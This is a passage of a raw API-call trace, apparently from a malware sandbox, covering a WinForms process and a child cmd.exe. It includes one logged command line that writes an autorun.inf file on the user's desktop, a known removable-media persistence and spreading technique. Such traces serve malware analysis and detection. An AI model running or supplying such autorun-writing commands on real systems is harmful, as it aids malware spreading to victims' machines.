Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0311.826] GetParent (hWnd=0x1502ce) returned 0xd014a [0311.826] GetCurrentActCtx (in: lphActCtx=0x1aef14 | out: lphActCtx=0x1aef14*=0x70b91c) returned 1 [0311.826] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.827] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x216b9a0 | out: lpWndClass=0x216b9a0) returned 1 [0311.827] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.828] CoTaskMemAlloc (cb=0x62) returned 0x709fd8 [0311.828] RegisterClassW (lpWndClass=0x1aedcc) returned 0xc1e3 [0311.829] CoTaskMemFree (pv=0x709fd8) [0311.829] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.829] CreateWindowExW (dwExStyle=0x200, lpClassName="WindowsForms10.RichEdit20W.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x56210044, X=60, Y=276, nWidth=308, nHeight=21, hWndParent=0xd014a, hMenu=0x0, hInstance=0x10000, lpParam=0x0) [0311.829] SetWindowLongW (hWnd=0xd02de, nIndex=-4, dwNewLong=1850377184) returned 76352158 [0311.830] GetWindowLongW (hWnd=0xd02de, nIndex=-4) returned 1850377184 [0311.830] SetWindowLongW (hWnd=0xd02de, nIndex=-4, dwNewLong=76352198) returned 1850377184 [0311.830] GetWindowLongW (hWnd=0xd02de, nIndex=-4) returned 76352198 [0311.830] GetWindowLongW (hWnd=0xd02de, nIndex=-16) returned 1176567876 [0311.830] GetWindowLongW (hWnd=0xd02de, nIndex=-12) returned 0 [0311.830] SetWindowLongW (hWnd=0xd02de, nIndex=-12, dwNewLong=852702) returned 0 [0311.830] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x81, wParam=0x0, lParam=0x1ae938) returned 0x0 [0311.832] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x7c, wParam=0xffffffec, lParam=0x1ad20c) returned 0x0 [0311.833] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x7d, wParam=0xffffffec, lParam=0x1ad20c) returned 0x0 [0311.898] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x83, wParam=0x0, lParam=0x1ae924) returned 0x0 [0311.899] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x1, wParam=0x0, lParam=0x1ae938) [0311.902] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x46, wParam=0x0, lParam=0x1adaac) returned 0x0 [0311.902] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x83, wParam=0x1, lParam=0x1ada84) returned 0x0 [0311.903] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x47, wParam=0x0, lParam=0x1adaac) returned 0x0 [0311.903] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x5, wParam=0x0, lParam=0x110130) returned 0x0 [0311.903] GetClientRect (in: hWnd=0xd02de, lpRect=0x1ad7c4 | out: lpRect=0x1ad7c4) returned 1 [0311.903] GetWindowRect (in: hWnd=0xd02de, lpRect=0x1ad7c4 | out: lpRect=0x1ad7c4) returned 1 [0311.903] GetParent (hWnd=0xd02de) returned 0xd014a [0311.903] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ad7c4, cPoints=0x2 | out: lpPoints=0x1ad7c4) returned -7077974 [0311.903] GetParent (hWnd=0xd02de) returned 0xd014a [0311.986] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x7c, wParam=0xfffffff0, lParam=0x1adb64) returned 0x0 [0311.986] CallWindowProcW (lpPrevWndFunc=0x6e4a83e0, hWnd=0xd02de, Msg=0x7d, wParam=0xfffffff0, lParam=0x1adb64) returned 0x1 Thread: id = 2 os_tid = 0x1058 Thread: id = 3 os_tid = 0xf88 Thread: id = 4 os_tid = 0xcdc [0099.212] CoGetContextToken (in: pToken=0x429fc3c | out: pToken=0x429fc3c) returned 0x800401f0 [0099.212] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0099.212] RoInitialize () returned 0x1 [0099.212] RoUninitialize () returned 0x0 [0308.848] CloseHandle (hObject=0x48c) returned 1 [0308.849] CloseHandle (hObject=0x460) returned 1 [0308.851] CloseHandle (hObject=0x474) returned 1 [0308.852] CloseHandle (hObject=0x47c) returned 1 [0308.853] CloseHandle (hObject=0x468) returned 1 [0308.854] CloseHandle (hObject=0x488) returned 1 [0308.856] CloseHandle (hObject=0x470) returned 1 [0308.857] CloseHandle (hObject=0x454) returned 1 [0308.858] CloseHandle (hObject=0x480) returned 1 [0308.858] CloseHandle (hObject=0x44c) returned 1 [0308.859] CloseHandle (hObject=0x478) returned 1 [0308.860] CloseHandle (hObject=0x448) returned 1 [0308.861] CloseHandle (hObject=0x438) returned 1 [0308.861] CloseHandle (hObject=0x46c) returned 1 [0308.862] CloseHandle (hObject=0x484) returned 1 Thread: id = 5 os_tid = 0x77c Thread: id = 6 os_tid = 0xa88 Thread: id = 7 os_tid = 0x6f0 Thread: id = 8 os_tid = 0x514 Thread: id = 230 os_tid = 0xb74 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6fff4000" os_pid = "0x254" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C echo ^[autorun^] >autorun.inf" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 433 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 434 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 435 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 436 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 437 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 438 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 439 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 440 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 441 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 442 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 443 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 444 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 445 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 446 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 447 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 448 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 449 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 450 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 451 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 452 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 453 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 454 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 455 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 456 start_va = 0x470000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 457 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 458 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 459 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 460 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 461 start_va = 0x470000 end_va = 0x52dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 462 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 546 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 547 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 548 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 549 start_va = 0x810000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 550 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 551 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 9 os_tid = 0xc10 [0145.343] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0145.343] __set_app_type (_Type=0x1) [0145.343] __p__fmode () returned 0x74ac4d6c [0145.343] __p__commode () returned 0x74ac5b1c [0145.343] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0145.344] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0145.358] GetCurrentThreadId () returned 0xc10 [0145.358] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc10) returned 0x84 [0145.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0145.359] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0145.359] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.383] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0145.383] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0145.383] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.383] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0145.383] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0145.383] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.383] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0145.383] GetConsoleOutputCP () returned 0x1b5 [0145.384] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0145.384] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.384] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.385] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.385] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0145.385] _get_osfhandle (_FileHandle=0) returned 0x38 [0145.385] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0145.385] _get_osfhandle (_FileHandle=0) returned 0x38 [0145.385] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0145.386] GetEnvironmentStringsW () returned 0x617f88* [0145.386] GetProcessHeap () returned 0x610000 [0145.386] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x6189b0 [0145.386] FreeEnvironmentStringsA (penv="A") returned 1 [0145.386] GetProcessHeap () returned 0x610000 [0145.386] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x613450 [0145.386] GetEnvironmentStringsW () returned 0x617f88* [0145.386] GetProcessHeap () returned 0x610000 [0145.386] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x6193d8 [0145.386] FreeEnvironmentStringsA (penv="A") returned 1 [0145.386] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.387] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.387] RegCloseKey (hKey=0x94) returned 0x0 [0145.387] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0145.388] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0145.388] RegCloseKey (hKey=0x94) returned 0x0 [0145.388] time (in: timer=0x0 | out: timer=0x0) returned 0x620b74ab [0145.388] srand (_Seed=0x620b74ab) [0145.388] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^[autorun^] >autorun.inf" [0145.388] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^[autorun^] >autorun.inf" [0145.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0145.391] GetProcessHeap () returned 0x610000 [0145.391] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x6170c8 [0145.391] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6170d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0145.391] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0145.391] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0145.391] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.391] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0145.391] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0145.391] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0145.391] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0145.391] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0145.391] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0145.391] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0145.391] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0145.391] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0145.391] GetProcessHeap () returned 0x610000 [0145.392] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6189b0) returned 1 [0145.392] GetEnvironmentStringsW () returned 0x617f88* [0145.392] GetProcessHeap () returned 0x610000 [0145.392] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa32) returned 0x61a840 [0145.392] FreeEnvironmentStringsA (penv="A") returned 1 [0145.392] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0145.392] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.392] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0145.392] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0145.392] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0145.392] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0145.392] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0145.392] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0145.392] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0145.393] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0145.393] GetProcessHeap () returned 0x610000 [0145.393] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x617e58 [0145.393] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0145.393] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0145.393] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0145.393] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x617ea8 [0145.393] FindClose (in: hFindFile=0x617ea8 | out: hFindFile=0x617ea8) returned 1 [0145.393] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x617ea8 [0145.394] FindClose (in: hFindFile=0x617ea8 | out: hFindFile=0x617ea8) returned 1 [0145.394] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0145.394] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa74ac1a0, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xa74ac1a0, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x617ea8 [0145.394] FindClose (in: hFindFile=0x617ea8 | out: hFindFile=0x617ea8) returned 1 [0145.394] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0145.394] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0145.394] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0145.394] GetProcessHeap () returned 0x610000 [0145.395] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61a840) returned 1 [0145.395] GetEnvironmentStringsW () returned 0x617f88* [0145.395] 